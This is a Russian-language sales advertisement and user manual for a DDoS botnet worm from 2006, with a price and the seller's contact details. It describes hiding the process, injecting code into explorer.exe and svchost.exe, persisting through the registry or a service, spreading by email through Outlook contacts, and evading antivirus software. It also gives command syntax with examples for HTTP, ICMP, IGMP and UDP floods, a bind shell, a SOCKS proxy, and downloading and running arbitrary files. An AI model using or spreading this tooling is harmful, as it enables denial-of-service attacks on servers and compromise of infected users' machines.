//-----------------------------------------------------------------
DKCS WORM.DDoS bot v 0.1
c0d3d by: Dr.Pixel
2006 (C) DKCS Security

ЦЕНА - 1300 USD/WMZ

контакты:		icq: 	7600278
			e-mail:	dkcs@void.ru

Общие возможности:

1 Создание своей DDoS-сети.
2 Управление DDoS-сетью через WEB-интерфейс.
3 Создание правил для управления ботами (в WEB интерфейсе).
4 Возможность управления каждым ботом в отдельности.
//-----------------------------------------------------------------
Возможности бота:

1 Нивидимость в процессах.
2 Оптимальный режим работы ботом выбирается самостоятельно.
//=========
с парвами пользователя:
 1 Бот записывается HKLM/.../Run (автозагрузку).
 2 Инжектит свой код в процесс explorer.exe.
с правами администратора:
 1 Бот создает сервис со своей загрузкой.
  1.1 Невидно в процессах.
  1.2 Вы еще не зашли под пользователем, а бот уже работает.	
 2 Инжектит свой код в svchost.exe.
  2.1 svchost.exe - обычно в разрешенных приложениях в фаерволле.
  (некоторые фаерволы детектируют "насильное" изменение памяти
   процессов, над обходом уже работаю...)
//=========
4 Бот распространяется как почтовый червь (опционально).
  4.1 E-mail адреса из адресной книги Outlook.
  4.2 Отсылается через SMTP сервер зараженного.
//-----------------------------------------------------------------
Функции бота:

1 Собственно многопоточный HTTP DDoS.
 1.1 Поддержка как GET, так и POST ддоса.
 1.2 Базовая HTTP авторизация.
 1.3 Настройка параметров ддоса.
2 Многопоточный ICMP флуд.
3 Многопоточный IGMP флуд (new exploit under WinNT)
4 Многопоточный UDP флуд.
5 Бинд шелл.
6 Socks4 сервер.
7 Скачивание и запуск произвольного файла.
//-----------------------------------------------------------------
Синтаксис команд бота:

1. HTTP DDoS:

 !ddos <type> <host> <port> <script> <param> <auch?> <login> <pass>

 <type> - тип ддоса (get или post).
 <host> - адрес атакуемого сервера.
 <port> - порт, на котором запущен сервер.
 <script> - скрипт, который атакуется.
 <param> - параметры, с которыми идет запрос на скрипт.
 <auch?> - использовать авторизацию (1 - да, 0 - нет).
 <login> - логин (если используется авторизация).
 <pass> - пароль (если используется авторизация).

 Примеры запросов:
 !ddos post server.ru 80 /index.php ?name=111&email=222&message=333&submit=send 1 admin passwd
 !ddos post server.ru 80 /index.php ?name=111&email=222&message=333&submit=send 0
 !ddos get server.ru 80 /

 (НЕ ЗАБЫВАЙТЕ ПРИ ФЛУДЕ ФОРМ УКАЗЫВАТЬ НАЖАТИЕ НА КНОПКУ!)

2. ICMP флуд:

 !icmp <IP> <packet_size>

 <IP> - ИП адресс атакуемого сервера.
 <packet_size> - размер посылаемого пакета.

 Пример запроса:
 !icmp 10.11.12.13 256

3. IGMP флуд:

 !igmp <IP>

 <IP> - ИП адресс атакуемого сервера.

 Пример запроса:
 !igmp 10.11.12.1

4. UDP флуд:

 !udp <IP>

 <IP> - ИП адресс атакуемого сервера.

 Пример запроса:
 !udp 10.11.12.1

5. Скачивание и запуск файла:

 !download <from> <to> <run?> <del?>

 <from> - откуда скачивать.
 <to> - куда скачивать.
 <run?> - запускать файл (1 - да, 0 - нет)?
 <del?> - удалять файл (1 - да, 0 - нет)?

 Примеры запросов:
 !download http://server.ru/file.exe c:\cccp.exe 1 0
 !download http://server.ru/file.exe c:\abcd.exe 1 1

//-----------------------------------------------------------------
Дополнительная информация:

1 Размер (не сжатого!) файла бота: 48,0 KBytes (49 152 Bytes).
(сжатый, в среднем - 20-25 KBytes)
2 Антивирусные системы:
  [+] All AVP:     вирусов не обнаружено.
  (Zащита файла бота от AVP)
3 FiewWall's:
  [+] All FRW:	 все молчат.
  (в случае, если сервис бота был загружен раньше, чем фаерволла)
//-----------------------------------------------------------------
контакты:	icq: 	7600278
		e-mail:	dkcs@void.ru
P.S.
You can change the world!
If not, ask me how ;)

2006 (C) Dr.Pixel@DKCS
//-----------------------------------------------------------------